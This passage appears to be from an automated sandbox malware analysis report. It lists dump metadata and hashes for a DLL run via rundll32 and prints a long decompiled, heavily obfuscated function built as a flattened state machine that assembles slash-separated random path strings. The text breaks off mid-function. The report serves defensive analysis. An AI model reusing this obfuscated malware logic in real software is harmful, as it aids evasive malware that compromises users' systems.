0x10007a7d
0x10007a1b
0x10007a1e
0x00000000
0x00000000
0x00000000

APIs

operator+.LIBVCRUNTIME ref: 10007A49
DName::operator+.LIBCMT ref: 10007B9D
DName::operator+.LIBCMT ref: 10007BBA

Strings

/, xrefs: 100082E1

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$operator+
String ID: /
API String ID: 1595903985-2043925204
Opcode ID: 8d6b5924833221a86c8bdaafba5acd77cabc697b80bed03c32f945bb0d5c57de
Instruction ID: fc72c815a4e8a528ccbff4e3a0ca8b4c024423698133dcf6199ed2b6b0369a75
Opcode Fuzzy Hash: 8d6b5924833221a86c8bdaafba5acd77cabc697b80bed03c32f945bb0d5c57de
Instruction Fuzzy Hash: 08825275D006099BFB05CBA4C891BEEB7F4FF483C0F114129E956E7288EB79AA44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B29FDC, Relevance: 39.5, Strings: 31, Instructions: 734
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00B29FDC(void* __edx) {
				void* __edi;
				signed int _t751;
				void* _t787;
				signed char** _t788;
				signed char** _t790;
				signed char** _t793;
				signed char** _t799;
				short _t803;
				signed int _t804;
				signed int _t805;
				void* _t806;
				signed int _t809;
				signed int _t817;
				signed int _t820;
				signed int _t832;
				signed int _t836;
				signed int _t903;
				intOrPtr* _t917;
				short* _t918;
				short* _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t945;
				signed int _t946;
				signed int _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t954;
				void* _t955;

				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(_t917);
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(__edx);
				_push(1);
				E00B2602B(1);
				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
				_t950 = _t949 + 0x1c;
				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
				_t946 = 0;
				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
				_t806 = 0x2ca20b85;
				 *(_t950 + 0x9c) = 0xada2;
				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
				_t920 = 0x73;
				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
				 *(_t950 + 0x98) = 0x829e;
				_t921 = 0x5b;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
				 *(_t950 + 0x7c) = 0xdccb;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
				 *(_t950 + 0xb4) = 0xef7d;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
				 *(_t950 + 0xe8) = 0xccb1;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
				 *(_t950 + 0x74) = 0xc511;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
				_t922 = 0x69;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
				 *(_t950 + 0xa4) = 0x943d;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
				 *(_t950 + 0x114) = 0x676a;
				_t923 = 0xb;
				 *(_t950 + 0x130) = 0;
				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
				 *(_t950 + 0x4c) = 0x9f6f;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
				 *(_t950 + 0x44) = 0xfa80;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
				 *(_t950 + 0xec) = 0x5cda;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
				 *(_t950 + 0x2c) = 0x6ba5;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
				 *(_t950 + 0xb4) = 0xc1db;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
				 *(_t950 + 0xf0) = 0xa853;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
				 *(_t950 + 0xe8) = 0x787f;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
				 *(_t950 + 0xa8) = 0xf94e;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
				 *(_t950 + 0x118) = 0x6b15;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
				 *(_t950 + 0x10c) = 0x9660;
				_t804 = 0x3f;
				_t924 = 0x1c;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
				 *(_t950 + 0x8c) = 0x9ebc;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
				 *(_t950 + 0x124) = 0x986;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
				 *(_t950 + 0x84) = 0x3532;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
				 *(_t950 + 0xa4) = 0x41f;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
				 *(_t950 + 0x108) = 0x3cbe;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
				 *(_t950 + 0x68) = 0xe725;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
				 *(_t950 + 0xb8) = 0xbf58;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
				 *(_t950 + 0x100) = 0xd5da;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
				 *(_t950 + 0x54) = 0x395a;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
				 *(_t950 + 0xd4) = 0x77ed;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
				 *(_t950 + 0x114) = 0x68ca;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
				 *(_t950 + 0xdc) = 0x2f2e;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
				 *(_t950 + 0x24) = 0x5bdf;
				_t925 = 0xa;
				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
				_t926 = 0x47;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
				 *(_t950 + 0x40) = 0xbbeb;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
				 *(_t950 + 0xb0) = 0x7d23;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
				 *(_t950 + 0x60) = 0xae03;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
				 *(_t950 + 0xe4) = 0xc6a2;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
				 *(_t950 + 0x5c) = 0xaf00;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
				 *(_t950 + 0x24) = 0xf54a;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
				 *(_t950 + 0x124) = 0xcc46;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
				 *(_t950 + 0x12c) = 0x5a4b;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
				 *(_t950 + 0x34) = 0x6135;
				_t927 = 0xf;
				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
				 *(_t950 + 0xfc) = 0x664c;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
				 *(_t950 + 0x7c) = 0x54c3;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
				 *(_t950 + 0x28) = 0x1122;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
				 *(_t950 + 0x40) = 0x14c1;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
				_t928 = 0x27;
				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
				 *(_t950 + 0x3c) = 0x8f59;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
				_t929 = 7;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
				_t930 = 0x30;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
				 *(_t950 + 0x108) = 0x8114;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
				 *(_t950 + 0x68) = 0x1eec;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
				 *(_t950 + 0x64) = 0x2753;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
				 *(_t950 + 0x1c) = 0xf5b7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
				 *(_t950 + 0x38) = 0x2f43;
				_t931 = 0x4b;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
				_t932 = 0x3a;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
				 *(_t950 + 0xf8) = 0xec82;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
				 *(_t950 + 0x94) = 0xef51;
				_t933 = 0x32;
				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
				_t934 = 0x11;
				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
				 *(_t950 + 0xc8) = 0xb312;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
				 *(_t950 + 0x98) = 0x3fa5;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
				 *(_t950 + 0x50) = 0xcffd;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
				 *(_t950 + 0xd8) = 0x2cbc;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
				 *(_t950 + 0x48) = 0xee7b;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
				 *(_t950 + 0xd0) = 0xc42e;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
				 *(_t950 + 0xcc) = 0xa2cf;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
				 *(_t950 + 0x11c) = 0xb9db;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
				 *(_t950 + 0x88) = 0xfaa3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
				 *(_t950 + 0xc0) = 0xa294;
				_t935 = 0x7e;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
				 *(_t950 + 0x80) = 0xa0b2;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
				 *(_t950 + 0x74) = 0x61f;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
				 *(_t950 + 0x1c) = 0xc0d2;
				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
				 *(_t950 + 0x70) = 0xbc2e;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
				_t936 = 0x17;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
				 *(_t950 + 0xfc) = 0xf001;
				_t937 = 0x14;
				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
				 *(_t950 + 0xc4) = 0x7c98;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
				 *(_t950 + 0xbc) = 0xfd89;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
				_t805 =  *(_t950 + 0x13c);
				 *(_t950 + 0x10) =  *(_t950 + 0x140);
				while(1) {
					L1:
					_t896 =  *(_t950 + 0x14);
					while(1) {
						L2:
						while(1) {
							L3:
							_t954 = _t806 - 0x1dc05553;
							if(_t954 > 0) {
								goto L27;
							}
							L4:
							if(_t954 == 0) {
								_push( *((intOrPtr*)(_t950 + 0x120)));
								E00B229E3(_t950 + 0x274, 0x400, E00B3889D(0xb3c6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
								_t950 = _t950 + 0x24;
								E00B32025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
								_t751 =  *(_t950 + 0x18);
								_t806 = 0x23448a49;
								while(1) {
									L1:
									_t896 =  *(_t950 + 0x14);
									goto L2;
								}
							} else {
								_t955 = _t806 - 0x160634a6;
								if(_t955 > 0) {
									__eflags = _t806 - 0x16d97506;
									if(_t806 == 0x16d97506) {
										E00B2F536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
										_t806 = 0x36d580c3;
										goto L13;
									} else {
										__eflags = _t806 - 0x1a0940a4;
										if(_t806 == 0x1a0940a4) {
											E00B2839D(_t950 + 0x170, _t917);
											_t806 = 0x1dc05553;
											goto L13;
										} else {
											__eflags = _t806 - 0x1a22d724;
											if(_t806 != 0x1a22d724) {
												goto L44;
											} else {
												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
												_t832 = _t950 + 0x13c;
												E00B2C769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
												_t950 = _t950 + 0x28;
												asm("sbb ecx, ecx");
												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
												goto L13;
											}
										}
									}
								} else {
									if(_t955 == 0) {
										 *(_t950 + 0x160) = _t751;
										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
										 *(_t950 + 0x160) = _t805;
										E00B296CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
										_pop(_t836);
										asm("sbb ecx, ecx");
										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
										goto L13;
									} else {
										if(_t806 == 0x6ef04) {
											E00B2F536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
											_t806 = 0x16d97506;
											goto L13;
										} else {
											if(_t806 == 0x9a9cbcb) {
												_push(_t806);
												_push( *((intOrPtr*)(_t917 + 4)));
												_t941 = E00B378B7(_t806);
												_t951 = _t950 + 4;
												_t805 = E00B28736(_t780);
												__eflags = _t805;
												if(__eflags != 0) {
													_t751 = E00B36B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
													_t950 = _t951 + 0x14;
													 *(_t950 + 0x10) = _t751;
													__eflags = _t751;
													if(__eflags == 0) {
														_push(_t805);
														_push( *(_t950 + 0xec));
														_t903 =  *(_t950 + 0xf8);
														_t817 =  *(_t950 + 0xbc);
														L48:
														E00B2F536(_t817, _t903);
													} else {
														_t806 = 0x160634a6;
														while(1) {
															L1:
															_t896 =  *(_t950 + 0x14);
															goto L2;
														}
													}
												}
											} else {
												if(_t806 == 0xb43f6cc) {
													__eflags = E00B39B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
													_t946 =  !=  ? 1 : _t946;
													_t806 = 0x2a19e3bf;
													 *(_t950 + 0x130) = _t946;
													L13:
													_t751 =  *(_t950 + 0x10);
													goto L14;
												} else {
													_t959 = _t806 - 0x13765d88;
													if(_t806 != 0x13765d88) {
														L44:
														__eflags = _t806 - 0x1a8884c7;
														if(__eflags != 0) {
															L14:
															_t896 =  *(_t950 + 0x14);
															continue;
														}
													} else {
														_push( *(_t950 + 0x108));
														_t787 = E00B3889D(0xb3c660,  *(_t950 + 0xa8), _t959);
														_t788 =  *0xb3ca38; // 0x0
														_t790 =  *0xb3ca38; // 0x0
														_t793 =  *0xb3ca38; // 0x0
														E00B37C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
														_t950 = _t950 + 0x2c;
														E00B32025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
														_t799 =  *0xb3ca38; // 0x0
														_t806 = 0x261be6d7;
														_t896 = ( *_t799)[4] & 0x0000ffff;
														_t751 =  *(_t950 + 0x10);
														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
														L2:
														L3:
														_t954 = _t806 - 0x1dc05553;
														if(_t954 > 0) {
															goto L27;
														}
													}
												}
											}
										}
									}
								}
							}
							L49:
							return _t946;
							L27:
							__eflags = _t806 - 0x23448a49;
							if(_t806 == 0x23448a49) {
								__eflags = E00B3511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
								if(__eflags == 0) {
									_t806 = 0x6ef04;
									goto L44;
								} else {
									_t806 = 0x1a22d724;
									goto L13;
								}
							} else {
								__eflags = _t806 - 0x261be6d7;
								if(_t806 == 0x261be6d7) {
									_t918 = _t950 + 0x270;
									_t809 = 6;
									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
									__eflags = _t948;
									while(__eflags != 0) {
										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
										E00B2D6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
										_t950 = _t950 + 0x18;
										_t919 = _t918 + _t945 * 2;
										_t803 = 0x2f;
										 *_t919 = _t803;
										_t918 = _t919 + 2;
										_t948 = _t948 - 1;
										__eflags = _t948;
									}
									_t946 =  *(_t950 + 0x130);
									 *_t918 = 0;
									_t806 = 0x1a0940a4;
									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
									goto L1;
								} else {
									__eflags = _t806 - 0x2a19e3bf;
									if(_t806 == 0x2a19e3bf) {
										E00B2F536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
										_t806 = 0x355eeb92;
										goto L13;
									} else {
										__eflags = _t806 - 0x2ca20b85;
										if(_t806 == 0x2ca20b85) {
											 *(_t950 + 0x12c) = E00B38C8F(_t806);
											_t806 = 0x9a9cbcb;
											goto L13;
										} else {
											__eflags = _t806 - 0x355eeb92;
											if(_t806 == 0x355eeb92) {
												E00B2F536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
												_t806 = 0x6ef04;
												goto L13;
											} else {
												__eflags = _t806 - 0x36d580c3;
												if(_t806 == 0x36d580c3) {
													_push(_t805);
													_push( *(_t950 + 0xc0));
